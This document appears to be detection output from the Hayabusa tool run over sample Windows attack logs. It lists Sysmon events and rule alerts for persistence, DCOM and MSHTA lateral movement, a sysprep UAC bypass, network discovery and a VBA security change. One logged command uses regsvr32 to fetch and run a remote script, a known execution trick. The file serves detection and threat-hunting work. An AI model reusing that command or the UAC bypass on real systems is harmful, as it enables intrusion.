365ABB72-B147-5CD9-0000-00109D4F0B00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /c notepad.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x133de | PID: 2372 | PGUID: 365ABB72-B167-5CD9-0000-0010EE150C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.681 +09:00,IEWIN7,1,info,,Process Created,Cmd: /u /s /i:https://raw.githubusercontent.com/3gstudent/SCTPersistence/master/calc.sct scrobj.dll | Process: C:\Windows\System32\regsvr32.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x1341d | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Flags Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.681 +09:00,IEWIN7,1,high,Evas,Regsvr32 Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:19.895 +09:00,IEWIN7,1,info,,Process Created,Cmd: notepad.exe | Process: C:\Windows\System32\notepad.exe | User: IEWIN7\IEUser | Parent Cmd: /c notepad.exe | LID: 0x133de | PID: 2584 | PGUID: 
365ABB72-B167-5CD9-0000-00109D240C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:21.212 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.15:49159 (IEWIN7) | Dst: 151.101.128.133:443 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 2476 | PGUID: 365ABB72-B167-5CD9-0000-001062160C00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:03:21.212 +09:00,IEWIN7,3,high,Exec | Evas,Regsvr32 Network Activity,,rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 03:05:18.692 +09:00,IEWIN7,1,info,,Process Created,Cmd: wmiadap.exe /F /T /R | Process: C:\Windows\System32\wbem\WMIADAP.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 1188 | PGUID: 365ABB72-B1DE-5CD9-0000-0010715B0D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_1_persist_bitsjob_SetNotifyCmdLine.evtx 2019-05-14 09:29:52.744 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:58172 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx 2019-05-14 09:32:22.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55099 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 
365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx 2019-05-14 09:32:36.775 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49158 (IEWIN7) | Dst: 10.0.2.17:55101 () | User: IEWIN7\IEUser | Process: C:\Windows\explorer.exe | PID: 2824 | PGUID: 365ABB72-0BAC-5CDA-0000-0010C5940300,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_DCOM_ShellBrowserWindow_ShellWindows.evtx 2019-05-14 10:29:04.306 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\System32\mshta.exe -Embedding | Process: C:\Windows\System32\mshta.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1070ce | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Exec,Suspicious MSHTA Process Patterns,,rules/sigma/process_creation/proc_creation_win_susp_mshta_pattern.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas | Exec,MSHTA Suspicious Execution 01,,rules/sigma/process_creation/proc_creation_win_susp_mshta_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 10:29:04.306 +09:00,IEWIN7,1,high,Evas,MSHTA Spwaned by SVCHOST,,rules/sigma/process_creation/proc_creation_win_lethalhta.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 10:29:05.534 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.16:49168 (IEWIN7) | Dst: 10.0.2.17:55683 () | User: IEWIN7\IEUser | Process: 
C:\Windows\System32\mshta.exe | PID: 1932 | PGUID: 365ABB72-19E0-5CDA-0000-001006711000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_DCOM_MSHTA_LethalHTA_Sysmon_3_1.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2676 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2676 | PGUID: 365ABB72-28D0-5CDA-0000-00103A6B1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.290 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,10,low,,Process 
Access,Src Process: | Tgt Process: C:\Windows\system32\whoami.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 3964 | Tgt PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\whoami.exe"" /groups | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 3964 | PGUID: 365ABB72-28D0-5CDA-0000-0010F76F1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:48.359 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.143 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 288 03573528 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3776 | PGUID: 
365ABB72-28D3-5CDA-0000-0010B08B1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.453 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 1020 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.453 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.453 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 1020 | PGUID: 365ABB72-28D3-5CDA-0000-001019AA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.470 +09:00,IEWIN7,10,low,,Process Access,Src Process: | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 2768 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.470 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" 
""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 2768 | PGUID: 365ABB72-28D3-5CDA-0000-00106FAA1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.470 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.487 +09:00,IEWIN7,10,low,,Process Access,Src Process: C:\Windows\explorer.exe | Tgt Process: C:\Windows\System32\sysprep\sysprep.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 2016 | Src PGUID: 365ABB72-28A0-5CDA-0000-001074181300 | Tgt PID: 572 | Tgt PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13587 | PID: 572 | PGUID: 365ABB72-28D3-5CDA-0000-00103BAC1300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.487 +09:00,IEWIN7,1,info,,Process Created,Cmd: consent.exe 968 312 0197CDB0 | Process: C:\Windows\System32\consent.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k netsvcs | LID: 0x3e7 | PID: 3388 | PGUID: 365ABB72-28D3-5CDA-0000-001055AD1300,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.814 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | Process: C:\Windows\System32\sysprep\sysprep.exe | User: IEWIN7\IEUser | Parent Cmd: powershell | LID: 0x13545 | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.831 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\cryptbase.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: Yokai Ltd. | Signed: false | Signature: Unavailable | PID: 3068 | PGUID: 365ABB72-28D3-5CDA-0000-00106DC31300 | Hash: SHA1=4DA0DCAD144039F6DD7739E37AB3A7B78FB86B4D,MD5=2BA4BC4753A29D56AA185C972CA1023E,SHA256=A6BE522A1FC48B391EFCB3A3CFE49560A455F1BB853505F7E9ACCA8EDF116B4C,IMPHASH=380A21A3D5988707B0CFE7CA5B1C7E0B",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.831 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\sysprep\sysprep.exe"" | LID: 0x13545 | PID: 3976 | PGUID: 365ABB72-28D3-5CDA-0000-001088C71300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 11:32:51.831 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_elevate_uacbypass_sysprep.evtx 2019-05-14 23:03:45.100 
+09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09c49153\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\Users\administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cmd.exe | Process: C:\Windows\system32\mstsc.exe | PID: 2580 | PGUID: ECAD0485-C903-5CDA-0000-0010340F1000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-14 23:04:05.697 +09:00,alice.insecurebank.local,11,high,C2,Hijack Legit RDP Session to Move Laterally,,rules/sigma/file_event/sysmon_tsclient_filewrite_startup.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-14 23:04:06.339 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09cc920e\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-14 23:04:28.860 +09:00,alice.insecurebank.local,11,info,,File Created,Path: C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_sysmon.exe_10b542d1f1b162e715ed4ef4ccd38dc6e1393c_7bfbbfce_09e09039\Report.wer.tmp | Process: C:\Windows\system32\RunDll32.exe | PID: 3596 | PGUID: 
ECAD0485-CA56-5CDA-0000-00102DE71000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_tsclient_startup_folder.evtx 2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49583 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:26.440 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49584 (alice.insecurebank.local) | Dst: 10.59.4.11:389 (DC1) | User: insecurebank\Administrator | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 4092 | PGUID: ECAD0485-F2EC-5CDA-0000-0010F1631500,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:26.738 +09:00,alice.insecurebank.local,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx 2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49586 (alice.insecurebank.local) | Dst: 10.59.4.24:445 (edward) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 
ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49587 (alice.insecurebank.local) | Dst: 10.59.4.21:445 (bob) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49588 (alice.insecurebank.local) | Dst: 10.59.4.22:445 (CHARLES) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49589 (alice.insecurebank.local) | Dst: 10.59.4.25:445 (FRED) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49590 (alice.insecurebank.local) | Dst: 10.59.4.11:445 (DC1) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49592 (alice.insecurebank.local) | Dst: 10.59.4.23:445 (dave) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:17:38.250 +09:00,alice.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.20:49593 (alice.insecurebank.local) | Dst: 10.59.4.12:445 (DEV_SERVER) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: ECAD0485-EC1E-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_3_Invoke_UserHunter_SourceMachine.evtx
2019-05-15 02:31:27.973 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_sysmon_18_Invoke_UserHunter_NetSessionEnum_DC-srvsvc.evtx
2019-05-15 02:42:52.833 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:42:52.848 +09:00,DC1.insecurebank.local,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:42:53.854 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49304 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 02:43:03.888 +09:00,DC1.insecurebank.local,3,info,,Network Connection,tcp | Src: 10.59.4.11:445 (DC1.insecurebank.local) | Dst: 10.59.4.20:49306 (ALICE) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: DFAE8213-F1B5-5CDA-0000-0010EB030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_enum_shares_target_sysmon_3_18.evtx
2019-05-15 13:18:40.474 +09:00,IEWIN7,13,medium,,Registry Key Value Set_Sysmon Alert,Defense Evasion - access to the VBA project object model in the Macro Settings changed | SetValue: HKU\S-1-5-21-3583694148-1414552638-2922671848-1000\Software\Microsoft\Office\16.0\Excel\Security\AccessVBOM: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 3804 | PGUID: 365ABB72-92DF-5CDB-0000-0010A15E1300,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/de_sysmon_13_VBA_Security_AccessVBOM.evtx
